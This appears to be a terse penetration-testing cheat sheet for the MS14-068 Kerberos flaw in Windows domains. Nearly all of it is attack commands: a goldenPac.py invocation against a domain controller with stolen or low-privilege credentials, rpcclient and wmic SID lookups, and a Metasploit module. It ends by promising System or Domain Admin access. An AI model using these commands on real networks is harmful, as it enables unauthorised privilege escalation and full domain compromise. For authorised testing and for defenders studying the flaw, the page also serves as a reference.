githubEdit

GoldenPac MS14-068

Enumeration

  • FindSMB2UPTime.py IP

Exploitation

  • goldenPac.py -dc-ip DC_IP DOMAIN/USER:'PASSWORD'@TARGET

OR

  • rpcclient $> lookupnames NAME

  • auxiliary/admin/kerberos/ms14_068_kerberos_checksum (Metaploit)

  • wmic useraccount get name,sid

With this attack, you Pass the Ticket to System/Admin or Domain Admin acces

Last updated